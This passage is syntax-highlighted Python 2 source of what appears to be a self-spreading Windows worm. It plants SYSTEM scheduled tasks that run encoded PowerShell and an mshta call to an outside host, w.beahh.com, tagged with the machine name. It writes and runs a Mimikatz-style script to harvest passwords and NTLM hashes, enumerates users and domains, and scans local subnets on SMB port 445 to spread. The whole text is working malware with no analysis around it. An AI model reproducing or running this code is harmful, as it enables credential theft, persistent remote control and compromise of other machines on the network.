<span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/SysWOW64/svhost.exe'</span><span class="p">):</span>
    <span class="n">dl</span> <span class="o">=</span> <span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">SysWOW64</span><span class="se">\\</span><span class="s">svhost.exe'</span>
<span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/system32/drivers/svchost.exe'</span><span class="p">):</span>
    <span class="n">dl</span> <span class="o">=</span> <span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">drivers</span><span class="se">\\</span><span class="s">svchost.exe'</span>
<span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/SysWOW64/drivers/svchost.exe'</span><span class="p">):</span>
    <span class="n">dl</span> <span class="o">=</span> <span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">SysWOW64</span><span class="se">\\</span><span class="s">drivers</span><span class="se">\\</span><span class="s">svchost.exe'</span>
<span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/temp/svvhost.exe'</span><span class="p">):</span>
    <span class="n">ee2</span> <span class="o">=</span> <span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">svvhost.exe'</span>
<span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/temp/svchost.exe'</span><span class="p">):</span>
    <span class="n">ee2</span> <span class="o">=</span> <span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">svchost.exe'</span>
<span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'C:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">WindowsPowerShell</span><span class="se">\\</span><span class="s">'</span><span class="p">):</span>
    <span class="n">usr0</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'cmd /c schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn DnsScan /tr "C:</span><span class="se">\\</span><span class="s">Windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">svchost.exe" /F'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
    <span class="n">usr1</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'cmd /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "</span><span class="se">\\</span><span class="s">Microsoft</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">mmka</span><span class="p">():</span>
    <span class="k">global</span> <span class="n">domainlist</span>
    <span class="k">global</span> <span class="n">passlist</span>
    <span class="k">global</span> <span class="n">userlist2</span>
    <span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'C:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">WindowsPowerShell</span><span class="se">\\</span><span class="s">'</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/temp/m.ps1'</span><span class="p">):</span>
            <span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/temp/mkatz.ini'</span><span class="p">):</span>
                <span class="k">print</span> <span class="s">'mkatz.ini exist'</span>
                <span class="n">mtime</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">getmtime</span><span class="p">(</span><span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">mkatz.ini'</span><span class="p">)</span>
                <span class="n">mnow</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">time</span><span class="p">.</span><span class="n">time</span><span class="p">())</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">mnow</span> <span class="o">-</span> <span class="n">mtime</span><span class="p">)</span> <span class="o">/</span> <span class="mi">60</span> <span class="o">/</span> <span class="mi">60</span> <span class="o">&lt;</span> <span class="mi">24</span><span class="p">:</span>
                    <span class="n">musr</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">mkatz.ini'</span><span class="p">,</span> <span class="s">'r'</span><span class="p">).</span><span class="n">read</span><span class="p">()</span>
                <span class="k">else</span><span class="p">:</span>
                    <span class="k">print</span> <span class="s">'reload mimi'</span>
                    <span class="k">if</span> <span class="s">'PROGRAMFILES(X86)'</span> <span class="ow">in</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">:</span>
                        <span class="n">usr</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'C:</span><span class="se">\\</span><span class="s">Windows</span><span class="se">\\</span><span class="s">SysNative</span><span class="se">\\</span><span class="s">WindowsPowerShell</span><span class="se">\\</span><span class="s">v1.0</span><span class="se">\\</span><span class="s">powershell.exe -exec bypass "import-module c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">m.ps1;Invoke-Cats -pwds"'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
                    <span class="k">else</span><span class="p">:</span>
                        <span class="n">usr</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'powershell.exe -exec bypass "import-module c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">m.ps1;Invoke-Cats -pwds"'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
                    <span class="n">musr</span> <span class="o">=</span> <span class="n">usr</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
                    <span class="n">fmk</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">mkatz.ini'</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span>
                    <span class="n">fmk</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">musr</span><span class="p">)</span>
                    <span class="n">fmk</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="k">print</span> <span class="s">'reload mimi'</span>
                <span class="k">if</span> <span class="s">'PROGRAMFILES(X86)'</span> <span class="ow">in</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">:</span>
                    <span class="n">usr</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'C:</span><span class="se">\\</span><span class="s">Windows</span><span class="se">\\</span><span class="s">SysNative</span><span class="se">\\</span><span class="s">WindowsPowerShell</span><span class="se">\\</span><span class="s">v1.0</span><span class="se">\\</span><span class="s">powershell.exe -exec bypass "import-module c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">m.ps1;Invoke-Cats -pwds"'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
                <span class="k">else</span><span class="p">:</span>
                    <span class="n">usr</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'powershell.exe -exec bypass "import-module c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">m.ps1;Invoke-Cats -pwds"'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
                <span class="n">musr</span> <span class="o">=</span> <span class="n">usr</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
                <span class="n">fmk</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">mkatz.ini'</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span>
                <span class="n">fmk</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">musr</span><span class="p">)</span>
                <span class="n">fmk</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">fm</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">m.ps1'</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span>
            <span class="n">fm</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">mkatz</span><span class="p">)</span>
            <span class="n">fm</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
            <span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/temp/mkatz.ini'</span><span class="p">):</span>
                <span class="k">print</span> <span class="s">'mkatz.ini exist'</span>
                <span class="n">mtime</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">getmtime</span><span class="p">(</span><span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">mkatz.ini'</span><span class="p">)</span>
                <span class="n">mnow</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">time</span><span class="p">.</span><span class="n">time</span><span class="p">())</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">mnow</span> <span class="o">-</span> <span class="n">mtime</span><span class="p">)</span> <span class="o">/</span> <span class="mi">60</span> <span class="o">/</span> <span class="mi">60</span> <span class="o">&lt;</span> <span class="mi">24</span><span class="p">:</span>
                    <span class="k">print</span> <span class="s">'reload mimi'</span>
                    <span class="n">musr</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">mkatz.ini'</span><span class="p">,</span> <span class="s">'r'</span><span class="p">).</span><span class="n">read</span><span class="p">()</span>
                <span class="k">else</span><span class="p">:</span>
                    <span class="k">print</span> <span class="s">'reload mimi'</span>
                    <span class="k">if</span> <span class="s">'PROGRAMFILES(X86)'</span> <span class="ow">in</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">:</span>
                        <span class="n">usr</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'C:</span><span class="se">\\</span><span class="s">Windows</span><span class="se">\\</span><span class="s">SysNative</span><span class="se">\\</span><span class="s">WindowsPowerShell</span><span class="se">\\</span><span class="s">v1.0</span><span class="se">\\</span><span class="s">powershell.exe -exec bypass "import-module c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">m.ps1;Invoke-Cats -pwds"'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
                    <span class="k">else</span><span class="p">:</span>
                        <span class="n">usr</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'powershell.exe -exec bypass "import-module c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">m.ps1;Invoke-Cats -pwds"'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
                    <span class="n">musr</span> <span class="o">=</span> <span class="n">usr</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
                    <span class="n">fmk</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">mkatz.ini'</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span>
                    <span class="n">fmk</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">musr</span><span class="p">)</span>
                    <span class="n">fmk</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="k">print</span> <span class="s">'reload mimi'</span>
                <span class="k">if</span> <span class="s">'PROGRAMFILES(X86)'</span> <span class="ow">in</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">:</span>
                    <span class="n">usr</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'C:</span><span class="se">\\</span><span class="s">Windows</span><span class="se">\\</span><span class="s">SysNative</span><span class="se">\\</span><span class="s">WindowsPowerShell</span><span class="se">\\</span><span class="s">v1.0</span><span class="se">\\</span><span class="s">powershell.exe -exec bypass "import-module c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">m.ps1;Invoke-Cats -pwds"'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
                <span class="k">else</span><span class="p">:</span>
                    <span class="n">usr</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'powershell.exe -exec bypass "import-module c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">m.ps1;Invoke-Cats -pwds"'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
                <span class="n">musr</span> <span class="o">=</span> <span class="n">usr</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
                <span class="n">fmk</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">mkatz.ini'</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span>
                <span class="n">fmk</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">musr</span><span class="p">)</span>
                <span class="n">fmk</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">usr3</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'cmd /c start /b sc start Schedule&amp;ping localhost&amp;sc query Schedule|findstr RUNNING&amp;&amp;(schtasks /delete /TN Autocheck /f&amp;schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%"&amp;schtasks /run /TN Autocheck)'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
        <span class="n">usr4</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'cmd /c start /b sc start Schedule&amp;ping localhost&amp;sc query Schedule|findstr RUNNING&amp;&amp;(schtasks /delete /TN Autoscan /f&amp;schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autoscan /tr "C:</span><span class="se">\\</span><span class="s">Windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">svchost.exe"&amp;schtasks /run /TN Autoscan)'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
    <span class="k">print</span> <span class="s">'mimi over'</span>
    <span class="n">usern</span> <span class="o">=</span> <span class="s">''</span>
    <span class="n">lmhash</span> <span class="o">=</span> <span class="s">''</span>
    <span class="n">nthash</span> <span class="o">=</span> <span class="s">''</span>
    <span class="n">tspkg</span> <span class="o">=</span> <span class="s">''</span>
    <span class="n">wdigest</span> <span class="o">=</span> <span class="s">''</span>
    <span class="n">kerberos</span> <span class="o">=</span> <span class="s">''</span>
    <span class="n">domain</span> <span class="o">=</span> <span class="s">''</span>
    <span class="n">usernull</span> <span class="o">=</span> <span class="s">''</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">dousr</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'cmd /c wmic ntdomain get domainname'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
        <span class="n">domianusr</span> <span class="o">=</span> <span class="n">dousr</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
        <span class="n">dousr</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'cmd /c net user'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
        <span class="n">luser</span> <span class="o">=</span> <span class="n">dousr</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">read</span><span class="p">().</span><span class="n">split</span><span class="p">(</span><span class="s">'</span><span class="se">\r\n</span><span class="s">'</span><span class="p">)[:</span><span class="o">-</span><span class="mi">3</span><span class="p">]</span>
        <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">luser</span><span class="p">:</span>
            <span class="k">if</span> <span class="s">'-'</span> <span class="ow">in</span> <span class="n">c</span><span class="p">:</span>
                <span class="k">continue</span>
            <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="n">c</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">' '</span><span class="p">):</span>
                <span class="k">if</span> <span class="s">''</span> <span class="o">==</span> <span class="n">j</span><span class="p">:</span>
                    <span class="k">continue</span>
                <span class="k">if</span> <span class="s">'Guest'</span> <span class="o">==</span> <span class="n">j</span><span class="p">:</span>
                    <span class="k">continue</span>
                <span class="n">userlist2</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">j</span><span class="p">.</span><span class="n">strip</span><span class="p">())</span>

        <span class="k">if</span> <span class="s">'* LM'</span> <span class="ow">in</span> <span class="n">musr</span><span class="p">:</span>
            <span class="n">mmlist</span> <span class="o">=</span> <span class="n">musr</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'* LM'</span><span class="p">)</span>
            <span class="k">del</span> <span class="n">mmlist</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
            <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">mmlist</span><span class="p">:</span>
                <span class="n">domaint</span> <span class="o">=</span> <span class="n">i</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'Domain   :'</span><span class="p">)[</span><span class="mi">1</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span>
                <span class="k">if</span> <span class="n">domaint</span> <span class="ow">in</span> <span class="n">domianusr</span><span class="p">:</span>
                    <span class="n">domainlist</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">domaint</span><span class="p">)</span>
                <span class="k">for</span> <span class="n">ii</span> <span class="ow">in</span> <span class="n">i</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'Authentication'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">'Username :'</span><span class="p">)[</span><span class="mi">1</span><span class="p">:]:</span>
                    <span class="n">unt</span> <span class="o">=</span> <span class="n">ii</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span>
                    <span class="n">userlist2</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">unt</span><span class="p">)</span>

                <span class="k">for</span> <span class="n">ii</span> <span class="ow">in</span> <span class="n">i</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'Authentication'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">'Password :'</span><span class="p">)[</span><span class="mi">1</span><span class="p">:]:</span>
                    <span class="n">pwdt</span> <span class="o">=</span> <span class="n">ii</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span>
                    <span class="k">if</span> <span class="n">pwdt</span> <span class="o">!=</span> <span class="s">'(null)'</span><span class="p">:</span>
                        <span class="n">passlist</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">pwdt</span><span class="p">)</span>

                <span class="n">passlist</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="nb">set</span><span class="p">(</span><span class="n">passlist</span><span class="p">))</span>
                <span class="n">userlist2</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="nb">set</span><span class="p">(</span><span class="n">userlist2</span><span class="p">))</span>
                <span class="n">domainlist</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="nb">set</span><span class="p">(</span><span class="n">domainlist</span><span class="p">))</span>

        <span class="k">else</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">'nobody logon'</span>
        <span class="k">if</span> <span class="s">'* NTLM'</span> <span class="ow">in</span> <span class="n">musr</span><span class="p">:</span>
            <span class="n">mmlist</span> <span class="o">=</span> <span class="n">musr</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'* NTLM'</span><span class="p">)</span>
            <span class="k">del</span> <span class="n">mmlist</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
            <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">mmlist</span><span class="p">:</span>
                <span class="n">NThash</span> <span class="o">=</span> <span class="n">i</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">':'</span><span class="p">)[</span><span class="mi">1</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span>
                <span class="n">ntlist</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">NThash</span><span class="p">)</span>

    <span class="k">except</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'except'</span>


<span class="n">mmka</span><span class="p">()</span>
<span class="n">var</span> <span class="o">=</span> <span class="mi">1</span>
<span class="k">while</span> <span class="n">var</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
    <span class="k">print</span> <span class="s">'start scan'</span>
    <span class="k">if</span> <span class="s">'.exe'</span> <span class="ow">in</span> <span class="n">dl</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">network</span> <span class="ow">in</span> <span class="n">find_ip</span><span class="p">():</span>
            <span class="k">print</span> <span class="n">network</span>
            <span class="n">ip</span><span class="p">,</span> <span class="n">cidr</span> <span class="o">=</span> <span class="n">network</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'/'</span><span class="p">)</span>
            <span class="n">cidr</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">cidr</span><span class="p">)</span>
            <span class="n">host_bits</span> <span class="o">=</span> <span class="mi">32</span> <span class="o">-</span> <span class="n">cidr</span>
            <span class="n">i</span> <span class="o">=</span> <span class="n">struct</span><span class="p">.</span><span class="n">unpack</span><span class="p">(</span><span class="s">'&gt;I'</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_aton</span><span class="p">(</span><span class="n">ip</span><span class="p">))[</span><span class="mi">0</span><span class="p">]</span>
            <span class="n">start</span> <span class="o">=</span> <span class="n">i</span> <span class="o">&gt;&gt;</span> <span class="n">host_bits</span> <span class="o">&lt;&lt;</span> <span class="n">host_bits</span>
            <span class="n">end</span> <span class="o">=</span> <span class="n">i</span> <span class="o">|</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="n">host_bits</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span>
            <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">start</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">end</span><span class="p">):</span>
                <span class="n">semaphore1</span><span class="p">.</span><span class="n">acquire</span><span class="p">()</span>
                <span class="n">ip</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">'&gt;I'</span><span class="p">,</span> <span class="n">i</span><span class="p">))</span>
                <span class="n">t1</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">scansmb</span><span class="p">,</span> <span class="n">args</span><span class="o">=</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">445</span><span class="p">))</span>
                <span class="n">t1</span><span class="p">.</span><span class="n">start</span><span class="p">()</span>

            <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

    <span class="k">print</span> <span class="s">'smb over  sleep 200s'</span>
    <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span>
    <span class="k">if</span> <span class="s">'Windows-XP'</span> <span class="ow">in</span> <span class="n">platform</span><span class="p">.</span><span class="n">platform</span><span class="p">():</span>
        <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1000</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'start scan2'</span>
        <span class="k">if</span> <span class="s">'.exe'</span> <span class="ow">in</span> <span class="n">dl</span><span class="p">:</span>
            <span class="k">for</span> <span class="n">network</span> <span class="ow">in</span> <span class="n">iplist2</span><span class="p">:</span>
                <span class="n">ip</span><span class="p">,</span> <span class="n">cidr</span> <span class="o">=</span> <span class="n">network</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'/'</span><span class="p">)</span>
                <span class="k">if</span> <span class="n">ip</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span> <span class="o">==</span> <span class="s">'192'</span><span class="p">:</span>
                    <span class="k">continue</span>
                <span class="k">if</span> <span class="n">ip</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span> <span class="o">==</span> <span class="s">'127'</span><span class="p">:</span>
                    <span class="k">continue</span>
